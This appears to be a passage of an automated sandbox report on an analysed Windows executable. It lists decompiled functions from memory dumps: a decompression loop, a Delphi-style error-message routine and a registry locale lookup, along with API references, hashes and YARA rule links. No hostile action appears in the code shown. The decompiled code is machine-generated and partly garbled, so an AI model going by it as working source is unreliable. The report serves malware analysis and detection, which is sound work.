													__eflags = _t616 - _v72;
													if(_t616 == _v72) {
														_t616 = 0;
														__eflags = 0;
													}
													_v56 = _v56 - 1;
													 *_v108 = _v25;
													_v24 = _v24 + 1;
													_v108 = _v108 + 1;
													__eflags = _v56;
													if(_v56 == 0) {
														break;
													}
													__eflags = _v24 - _a8;
													if(_v24 < _a8) {
														continue;
													}
													break;
												}
												L93:
												__eflags = _v24 - _a8;
												if(_v24 < _a8) {
													continue;
												}
												goto L94;
											}
											return 1;
										} else {
											_v56 = 0xffffffff;
											goto L94;
										}
									}
									_t411 = E0040D094(_t474 + _t474 + _v20 + 0x198,  &_v136);
									__eflags = _t411;
									if(_t411 != 0) {
										__eflags = E0040D094(_t474 + _t474 + _v20 + 0x1b0,  &_v136);
										if(__eflags != 0) {
											__eflags = E0040D094(_t474 + _t474 + _v20 + 0x1c8,  &_v136);
											if(__eflags != 0) {
												_t422 = _v52;
												_v52 = _v48;
											} else {
												_t422 = _v48;
											}
											_v48 = _v44;
										} else {
											_t422 = _v44;
										}
										_v44 = _t617;
										_t617 = _t422;
										L65:
										_v56 = E0040D244(_v20 + 0xa68, _v88,  &_v136, __eflags);
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t426 = 0xb;
										} else {
											_t426 = 8;
										}
										_t474 = _t426;
										goto L82;
									}
									__eflags = E0040D094((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88 + 0x1e0,  &_v136);
									if(__eflags != 0) {
										goto L65;
									}
									__eflags = _v64;
									if(_v64 != 0) {
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t508 = 0xb;
										} else {
											_t508 = 9;
										}
										_t474 = _t508;
										_t435 = _t616 - _t617;
										__eflags = _t435 - _v72;
										if(_t435 >= _v72) {
											_t435 = _t435 + _v72;
											__eflags = _t435;
										}
										_v25 =  *((intOrPtr*)(_v68 + _t435));
										 *((char*)(_v68 + _t616)) = _v25;
										_t616 = _t616 + 1;
										__eflags = _t616 - _v72;
										if(_t616 == _v72) {
											_t616 = 0;
											__eflags = 0;
										}
										 *_v108 = _v25;
										_v24 = _v24 + 1;
										__eflags = _v64 - _v72;
										if(_v64 < _v72) {
											_v64 = _v64 + 1;
										}
										goto L24;
									}
									return 1;
								}
								_t448 = (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + _v20 + 0xe6c;
								__eflags = _t474 - 7;
								if(__eflags < 0) {
									_v25 = E0040D1A4(_t448,  &_v136, __eflags);
								} else {
									_v96 = _t616 - _t617;
									__eflags = _v96 - _v72;
									if(__eflags >= 0) {
										_t161 =  &_v96;
										 *_t161 = _v96 + _v72;
										__eflags =  *_t161;
									}
									_v89 =  *((intOrPtr*)(_v68 + _v96));
									_v25 = E0040D1D0(_t448, _v89,  &_v136, __eflags);
								}
								 *_v108 = _v25;
								_v24 = _v24 + 1;
								_v108 = _v108 + 1;
								__eflags = _v64 - _v72;
								if(_v64 < _v72) {
									_t180 =  &_v64;
									 *_t180 = _v64 + 1;
									__eflags =  *_t180;
								}
								 *((char*)(_v68 + _t616)) = _v25;
								_t616 = _t616 + 1;
								__eflags = _t616 - _v72;
								if(_t616 == _v72) {
									_t616 = 0;
									__eflags = 0;
								}
								__eflags = _t474 - 4;
								if(_t474 >= 4) {
									__eflags = _t474 - 0xa;
									if(_t474 >= 0xa) {
										_t474 = _t474 - 6;
									} else {
										_t474 = _t474 - 3;
									}
								} else {
									_t474 = 0;
								}
								goto L93;
							}
							return 1;
						}
						return _v116;
					}
					L94:
					 *((intOrPtr*)(_v8 + 0x20)) = _v128;
					 *((intOrPtr*)(_v8 + 0x24)) = _v124;
					 *((intOrPtr*)(_v8 + 0x28)) = _t616;
					 *((intOrPtr*)(_v8 + 0x2c)) = _v60 + _v24;
					 *((intOrPtr*)(_v8 + 0x30)) = _v64;
					 *((intOrPtr*)(_v8 + 0x34)) = _t617;
					 *((intOrPtr*)(_v8 + 0x38)) = _v44;
					 *((intOrPtr*)(_v8 + 0x3c)) = _v48;
					 *((intOrPtr*)(_v8 + 0x40)) = _v52;
					 *(_v8 + 0x44) = _t474;
					 *((intOrPtr*)(_v8 + 0x48)) = _v56;
					 *((char*)(_v8 + 0x4c)) = _v76;
					 *((intOrPtr*)(_v8 + 0x14)) = _v136;
					 *((intOrPtr*)(_v8 + 0x18)) = _v132;
					 *_a4 = _v24;
					__eflags = 0;
					return 0;
				}
				_v80 = (0x300 <<  *(_v8 + 4) + _v40) + 0x736;
				_v84 = 0;
				_v108 = _v20;
				__eflags = _v84 - _v80;
				if(_v84 >= _v80) {
					L7:
					_v52 = 1;
					_v48 = 1;
					_v44 = 1;
					_t617 = 1;
					_v60 = 0;
					_v64 = 0;
					_t474 = 0;
					_t616 = 0;
					 *((char*)(_v68 + _v72 - 1)) = 0;
					E0040CFF4( &_v136);
					__eflags = _v116;
					if(_v116 != 0) {
						return _v116;
					}
					__eflags = _v112;
					if(_v112 == 0) {
						__eflags = 0;
						_v56 = 0;
						goto L12;
					} else {
						return 1;
					}
				} else {
					goto L6;
				}
				do {
					L6:
					 *_v108 = 0x400;
					_v84 = _v84 + 1;
					_v108 = _v108 + 2;
					__eflags = _v84 - _v80;
				} while (_v84 < _v80);
				goto L7;
			}

0x0040d348
0x0040d34b
0x0040d34e
0x0040d359
0x0040d35c
0x0040d36d
0x0040d37e
0x0040d386
0x0040d38f
0x0040d395
0x0040d39b
0x0040d3a4
0x0040d3ad
0x0040d3b6
0x0040d3bf
0x0040d3c8
0x0040d3d1
0x0040d3da
0x0040d3e3
0x0040d3e9
0x0040d3f2
0x0040d3f8
0x0040d401
0x0040d40f
0x0040d415
0x0040d41b
0x00000000
0x0040d41d
0x0040d424
0x0040d428
0x0040d42d
0x0040d430
0x0040d43d
0x0040d43d
0x0040d440
0x0040d444
0x0040d4e5
0x0040d4ee
0x0040d523
0x0040d523
0x0040d527
0x00000000
0x00000000
0x0040d52c
0x0040d52f
0x0040d4f5
0x0040d4f7
0x0040d4fa
0x0040d4fc
0x0040d4fc
0x0040d4fc
0x0040d509
0x0040d50a
0x0040d510
0x0040d512
0x0040d515
0x0040d518
0x0040d519
0x0040d51c
0x0040d51e
0x0040d51e
0x0040d51e
0x0040d520
0x0040d520
0x0040d520
0x00000000
0x0040d520
0x00000000
0x0040d52f
0x0040d531
0x0040d533
0x0040d54b
0x0040d535
0x0040d53f
0x0040d53f
0x0040d550
0x0040d552
0x0040d555
0x0040d558
0x0040d558
0x0040d561
0x0040d567
0x0040d56a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d570
0x0040d570
0x0040d579
0x0040d57c
0x0040d580
0x00000000
0x00000000
0x0040d58a
0x0040d58e
0x0040d5b1
0x0040d5b6
0x0040d5b8
0x0040d691
0x0040d696
0x0040d697
0x0040d7d7
0x0040d7dd
0x0040d7e0
0x0040d7e3
0x0040d7e6
0x0040d7ef
0x0040d7e8
0x0040d7e8
0x0040d7e8
0x0040d7f4
0x0040d80c
0x0040d80f
0x0040d815
0x0040d819
0x0040d820
0x0040d81b
0x0040d81b
0x0040d81b
0x0040d83c
0x0040d83f
0x0040d843
0x0040d8bc
0x0040d845
0x0040d84b
0x0040d84e
0x0040d85a
0x0040d85c
0x0040d860
0x0040d896
0x0040d8b8
0x0040d862
0x0040d886
0x0040d886
0x0040d860
0x0040d8bf
0x0040d8bf
0x0040d8c0
0x0040d8cb
0x0040d8cb
0x0040d8cf
0x0040d8d2
0x0040d8e4
0x0040d8e7
0x0040d8f4
0x0040d8e9
0x0040d8ec
0x0040d8ec
0x0040d8f7
0x0040d8f9
0x0040d8fb
0x0040d8fe
0x0040d900
0x0040d900
0x0040d900
0x0040d909
0x0040d912
0x0040d915
0x0040d916
0x0040d919
0x0040d91b
0x0040d91b
0x0040d91b
0x0040d91d
0x0040d926
0x0040d928
0x0040d92b
0x0040d92e
0x0040d932
0x00000000
0x00000000
0x0040d937
0x0040d93a
0x00000000
0x00000000
0x00000000
0x0040d93a
0x0040d93c
0x0040d93f
0x0040d942
0x00000000
0x00000000
0x00000000
0x0040d942
0x00000000
0x0040d8c2
0x0040d8c2
0x00000000
0x0040d8c2
0x0040d8c0
0x0040d6af
0x0040d6b4
0x0040d6b6
0x0040d766
0x0040d768
0x0040d786
0x0040d788
0x0040d78f
0x0040d795
0x0040d78a
0x0040d78a
0x0040d78a
0x0040d79b
0x0040d76a
0x0040d76a
0x0040d76a
0x0040d79e
0x0040d7a1
0x0040d7a3
0x0040d7b9
0x0040d7bc
0x0040d7bf
0x0040d7c8
0x0040d7c1
0x0040d7c1
0x0040d7c1
0x0040d7cd
0x00000000
0x0040d7cd
0x0040d6dd
0x0040d6df
0x00000000
0x00000000
0x0040d6e5
0x0040d6e9
0x0040d6f5
0x0040d6f8
0x0040d701
0x0040d6fa
0x0040d6fa
0x0040d6fa
0x0040d706
0x0040d70a
0x0040d70c
0x0040d70f
0x0040d711
0x0040d711
0x0040d711
0x0040d71a
0x0040d723
0x0040d726
0x0040d727
0x0040d72a
0x0040d72c
0x0040d72c
0x0040d72c
0x0040d734
0x0040d736
0x0040d73c
0x0040d73f
0x0040d745
0x0040d745
0x00000000
0x0040d73f
0x00000000
0x0040d6eb
0x0040d5e8
0x0040d5ed
0x0040d5f0
0x0040d631
0x0040d5f2
0x0040d5f6
0x0040d5fc
0x0040d5ff
0x0040d604
0x0040d604
0x0040d604
0x0040d604
0x0040d610
0x0040d621
0x0040d621
0x0040d63a
0x0040d63c
0x0040d63f
0x0040d645
0x0040d648
0x0040d64a
0x0040d64a
0x0040d64a
0x0040d64a
0x0040d653
0x0040d656
0x0040d657
0x0040d65a
0x0040d65c
0x0040d65c
0x0040d65c
0x0040d65e
0x0040d661
0x0040d66a
0x0040d66d
0x0040d677
0x0040d66f
0x0040d66f
0x0040d66f
0x0040d663
0x0040d663
0x0040d663
0x00000000
0x0040d661
0x00000000
0x0040d590
0x00000000
0x0040d582
0x0040d948
0x0040d94e
0x0040d957
0x0040d95d
0x0040d969
0x0040d972
0x0040d978
0x0040d981
0x0040d98a
0x0040d993
0x0040d999
0x0040d9a2
0x0040d9ab
0x0040d9b7
0x0040d9c0
0x0040d9c9
0x0040d9cb
0x00000000
0x0040d9cb
0x0040d461
0x0040d464
0x0040d46c
0x0040d472
0x0040d475
0x0040d48e
0x0040d495
0x0040d498
0x0040d49b
0x0040d49e
0x0040d4a0
0x0040d4a5
0x0040d4a8
0x0040d4b0
0x0040d4b2
0x0040d4bd
0x0040d4c2
0x0040d4c6
0x00000000
0x0040d4c8
0x0040d4d0
0x0040d4d4
0x0040d4e0
0x0040d4e2
0x00000000
0x0040d4d6
0x00000000
0x0040d4d6
0x00000000
0x00000000
0x00000000
0x0040d477
0x0040d477
0x0040d47a
0x0040d47f
0x0040d482
0x0040d489
0x0040d489
0x00000000

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
Instruction ID: a068efe37126c024b14c2b8cc3b836a628f8053012d03d8a2c3558ca0f700bcf
Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
Instruction Fuzzy Hash: 2532D375E00219DFCB14CFD9C980AADBBB2BF88314F24816AD815BB395D734AE46CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402260, Relevance: .1, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 51%

			E00402260(void* __eax, char* __edx) {
				char* _t103;

				_t103 = __edx;
				_t39 = __eax + 1;
				 *__edx = 0xffffffff89705f71;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = ((((((((((__eax + 0x00000001) * 0x89705f41 >> 0x00000020 & 0x1fffffff) + 0xfffffffe25c17d04 + (_t39 * 0x89705f41 >> 0x0000001e) & 0x0fffffff) + 0xfffffffe25c17d04 & 0x07ffffff) + 0xfffffffe25c17d04 & 0x03ffffff) + 0xfffffffe25c17d04 & 0x01ffffff) + 0xfffffffe25c17d04 & 0x00ffffff) + 0xfffffffe25c17d04 & 0x007fffff) + 0xfffffffe25c17d04 & 0x003fffff) + 0xfffffffe25c17d04 & 0x001fffff) + 0xfffffffe25c17d04 >> 0x00000014 | 0x00000030;
				_t37 = _t103 + 1; // 0x1
				return _t37;
			}

0x00402261
0x00402263
0x00402285
0x0040228c
0x0040229d
0x004022a8
0x004022b9
0x004022c4
0x004022d5
0x004022e0
0x004022f1
0x004022fc
0x0040230d
0x00402318
0x00402329
0x00402334
0x00402345
0x00402350
0x00402361
0x00402369
0x00402372
0x00402374
0x00402378

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Uniqueness

Uniqueness Score: -1.00%

Function 00412320, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d16f8212df3b075b12c01a7920a5d94c6785b53db595cafc7467b0de8ca70901
Instruction ID: 11f21a61521050906b6c7b5ef920636b3bb789ac6dd4a19e15c9adf861caa8a2
Opcode Fuzzy Hash: d16f8212df3b075b12c01a7920a5d94c6785b53db595cafc7467b0de8ca70901
Instruction Fuzzy Hash: 5331886295E3C18FDB53873888AA1817FB0AD1B22831E44DBC4C2CF0A7D05E594ACB27

Uniqueness

Uniqueness Score: -1.00%

Function 004096AC, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E004096AC(long __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char* _v8;
				long _v12;
				short _v140;
				short _v2188;
				void* _t16;
				char* _t18;
				intOrPtr _t20;
				intOrPtr _t22;
				intOrPtr _t31;
				intOrPtr _t55;
				intOrPtr _t56;
				int _t60;
				void* _t63;

				_push(__ebx);
				_push(__esi);
				_v8 = 0;
				_push(_t63);
				_push(0x4097d1);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t63 + 0xfffff778;
				_t60 = E004094C0(_t16, __ebx,  &_v2188, __edx, __edi, __esi, __fp0, 0x400);
				_t18 =  *0x412c2c; // 0x41304c
				if( *_t18 == 0) {
					_t20 =  *0x412b48; // 0x406b84
					_t12 = _t20 + 4; // 0xffe8
					_t22 =  *0x415b48; // 0x400000
					LoadStringW(E00405B90(_t22),  *_t12,  &_v140, 0x40);
					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
				} else {
					_t31 =  *0x412b68; // 0x413324
					E00402F6C(E0040317C(_t31));
					WideCharToMultiByte(1, 0,  &_v2188, _t60, 0, 0, 0, 0);
					 *((intOrPtr*)(__ebx + 0x458d53d8)) =  *((intOrPtr*)(__ebx + 0x458d53d8)) - 1;
					asm("cld");
					E00405AD8();
					WideCharToMultiByte(1, 0,  &_v2188, _t60, _v8, __ebx, 0, 0);
					WriteFile(GetStdHandle(0xfffffff4), _v8, __ebx,  &_v12, 0);
					WriteFile(GetStdHandle(0xfffffff4), 0x4097ec, 2,  &_v12, 0);
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E004097D8);
				_t56 =  *0x409688; // 0x40968c
				return E00405AE4( &_v8, _t56);
			}

0x004096b5
0x004096b6
0x004096b9
0x004096be
0x004096bf
0x004096c4
0x004096c7
0x004096da
0x004096dc
0x004096e4
0x00409782
0x00409787
0x0040978b
0x00409796
0x004097b0
0x004096ea
0x004096ea
0x004096f4
0x0040970d
0x00409711
0x00409717
0x00409723
0x00409740
0x00409758
0x00409772
0x00409772
0x004097b7
0x004097ba
0x004097bd
0x004097c5
0x004097d0

APIs

Part of subcall function 004094C0: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040966C), ref: 004094F3
Part of subcall function 004094C0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00409517
Part of subcall function 004094C0: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 00409532
Part of subcall function 004094C0: LoadStringW.USER32(00000000,0000FFE7,?,00000100), ref: 004095CD

WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,004097D1), ref: 0040970D
WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00409740
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00409752
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00409758
GetStdHandle.KERNEL32(000000F4,004097EC,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0040976C
WriteFile.KERNEL32(00000000,000000F4,004097EC,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 00409772
LoadStringW.USER32(00000000,0000FFE8,?,00000040), ref: 00409796
MessageBoxW.USER32(00000000,?,?,00002010), ref: 004097B0

Strings

$3A, xrefs: 004096EA
L0A, xrefs: 004096DC

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
String ID: $3A$L0A
API String ID: 135118572-3383676211
Opcode ID: 6256b621ce2eaf9d39ea15f4150e8e09d1030e9b365cd881d9086c78bb695208
Instruction ID: d743ab820349e8adbd7c60ec5032b16471490a2e5750d79ad5bafee0f0e263d8
Opcode Fuzzy Hash: 6256b621ce2eaf9d39ea15f4150e8e09d1030e9b365cd881d9086c78bb695208
Instruction Fuzzy Hash: A3317572644204BFEB10EB65DC82FDA77BCEB08704F508176B605F71D2DA74AE508B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040969F, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040969F(void* __eax, long __ebx, void* __ecx, void* __edx, void* __edi, int __esi, void* __fp0, intOrPtr _a8) {
				void* _v4;
				long _v8;
				intOrPtr _v16;
				short _v140;
				char _v1564;
				char _v1636;
				short _v2184;
				short _v2188;
				char _v2196;
				intOrPtr* _t22;
				long _t44;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t58;
				int _t60;

				_t60 = __esi;
				_t44 = __ebx;
				_t22 = __eax + 1;
				 *_t22 =  *_t22 + __ecx;
				_push(__ebx);
				if( *_t22 >= 0) {
					L9:
					E00405AD8();
					WideCharToMultiByte(1, 0,  &_v2184, _t60, _v4, _t44, 0, 0);
					WriteFile(GetStdHandle(0xfffffff4), _v4, _t44,  &_v8, 0);
					WriteFile(GetStdHandle(0xfffffff4), 0x4097ec, 2,  &_v8, 0);
					goto L11;
				} else {
					_push(__ebp);
					if(__eflags == 0) {
						L8:
						 *((intOrPtr*)(__ebx + 0x458d53d8)) =  *((intOrPtr*)(__ebx + 0x458d53d8)) - 1;
						asm("cld");
						goto L9;
					} else {
						asm("insb");
						if(__eflags >= 0) {
							E00408290(_v4,  &_v1564, _a8, __fp0);
							E004080DC(_v4);
							_t58 = 4;
							 *[fs:eax] = _t58;
							_push(E00409673);
							return L00404C88( &_v1636);
						} else {
							asm("rcl byte [ebp-0x75], 0xec");
							_push(__ebp);
							__ebp = __esp;
							__esp = __esp + 0xfffff778;
							_push(__ebx);
							_push(__esi);
							__ecx = 0;
							_v16 = 0;
							__ecx = 0;
							_push(__ebp);
							_push(0x4097d1);
							_push( *[fs:ecx]);
							 *[fs:ecx] = __esp;
							__ecx =  &_v2196;
							__esi = __eax;
							__eax =  *0x412c2c; // 0x41304c
							__eflags =  *__eax;
							if( *__eax == 0) {
								__eax =  &_v140;
								__eax =  *0x412b48; // 0x406b84
								_t17 = __eax + 4; // 0xffe8
								__eax =  *_t17;
								__eax =  *0x415b48; // 0x400000
								 &_v140 =  &_v2188;
								__eax = MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
							} else {
								__eax =  *0x412b68; // 0x413324
								 &_v2188 = WideCharToMultiByte(1, 0,  &_v2188, __esi, 0, 0, 0, 0);
								goto L8;
							}
							L11:
							__eflags = 0;
							_pop(_t55);
							 *[fs:eax] = _t55;
							_push(E004097D8);
							_t56 =  *0x409688; // 0x40968c
							return E00405AE4( &_v4, _t56);
						}
					}
				}
			}

0x0040969f
0x0040969f
0x0040969f
0x004096a0
0x004096a2
0x004096a3
0x00409718
0x00409723
0x00409740
0x00409758
0x00409772
0x00000000
0x004096a5
0x004096a5
0x004096a6
0x00409711
0x00409711
0x00409717
0x00000000
0x004096a8
0x004096a8
0x004096a9
0x00409644
0x0040964c
0x00409655
0x00409658
0x0040965b
0x0040966b
0x004096ab
0x004096ab
0x004096ac
0x004096ad
0x004096af
0x004096b5
0x004096b6
0x004096b7
0x004096b9
0x004096bc
0x004096be
0x004096bf
0x004096c4
0x004096c7
0x004096cf
0x004096da
0x004096dc
0x004096e1
0x004096e4
0x0040977b
0x00409782
0x00409787
0x00409787
0x0040978b
0x004097a7
0x004097b0
0x004096ea
0x004096ea
0x0040970d
0x00000000
0x0040970d
0x004097b5
0x004097b5
0x004097b7
0x004097ba
0x004097bd
0x004097c5
0x004097d0
0x004097d0
0x004096a9
0x004096a6

APIs

WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,004097D1), ref: 0040970D
WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00409740
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00409752
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00409758
GetStdHandle.KERNEL32(000000F4,004097EC,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0040976C
WriteFile.KERNEL32(00000000,000000F4,004097EC,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 00409772

Part of subcall function 004094C0: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040966C), ref: 004094F3
Part of subcall function 004094C0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00409517
Part of subcall function 004094C0: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 00409532
Part of subcall function 004094C0: LoadStringW.USER32(00000000,0000FFE7,?,00000100), ref: 004095CD

LoadStringW.USER32(00000000,0000FFE8,?,00000040), ref: 00409796
MessageBoxW.USER32(00000000,?,?,00002010), ref: 004097B0

Strings

$3A, xrefs: 004096EA
L0A, xrefs: 004096DC

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
String ID: $3A$L0A
API String ID: 135118572-3383676211
Opcode ID: 59a5544e00e8df00c93c8ac2435b0a387c19da4843a0f052570015d5bc5b541a
Instruction ID: 9623f77fa857817c419b37d2b63328917fb83caa2a3adea5a2c34ff05e22799b
Opcode Fuzzy Hash: 59a5544e00e8df00c93c8ac2435b0a387c19da4843a0f052570015d5bc5b541a
Instruction Fuzzy Hash: 0331B272644204BFEB14EB61DC82F9A77BCDB44714F6041BAB601B71D2DAB96E408A68

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCB4, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82
registryCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040BCB4(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr _t61;
				void* _t68;

				_push(__ebx);
				_v20 = 0;
				_v8 = 0;
				_push(_t68);
				_push(0x40bdae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffff0;
				_t21 = E00406728(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
				if(_t21 == 0) {
					_t22 =  *0x412c7c; // 0x4127d8
					if( *_t22 != 2) {
						if(E0040BC8C(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
							E0040BC80();
							RegCloseKey(_v12);
						}
					} else {
						if(E0040BC8C(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
							E0040BC80();
							RegCloseKey(_v12);
						}
					}
					E00405058( &_v20, _v8, E0040BEC4);
					E004032EC(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t21();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0040BDB5);
				L00404C88( &_v20);
				return L00404C88( &_v8);
			}

0x0040bcba
0x0040bcbd
0x0040bcc0
0x0040bcc5
0x0040bcc6
0x0040bccb
0x0040bcce
0x0040bce1
0x0040bce8
0x0040bcf3
0x0040bcfb
0x0040bd50
0x0040bd5d
0x0040bd66
0x0040bd66
0x0040bcfd
0x0040bd18
0x0040bd25
0x0040bd2e
0x0040bd2e
0x0040bd18
0x0040bd76
0x0040bd81
0x0040bd8c
0x0040bd8c
0x0040bcea
0x0040bcea
0x0040bcec
0x0040bd92
0x0040bd95
0x0040bd98
0x0040bda0
0x0040bdad

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0040BDAE), ref: 0040BCDB

Part of subcall function 00406728: GetProcAddress.KERNEL32(?,0040BDAE), ref: 0040674C

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0040BDAE), ref: 0040BD2E

Strings

kernel32.dll, xrefs: 0040BCD6
Locale, xrefs: 0040BD1D
.DEFAULT\Control Panel\International, xrefs: 0040BD05
GetUserDefaultUILanguage, xrefs: 0040BCD1
Control Panel\Desktop\ResourceLocale, xrefs: 0040BD3D

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

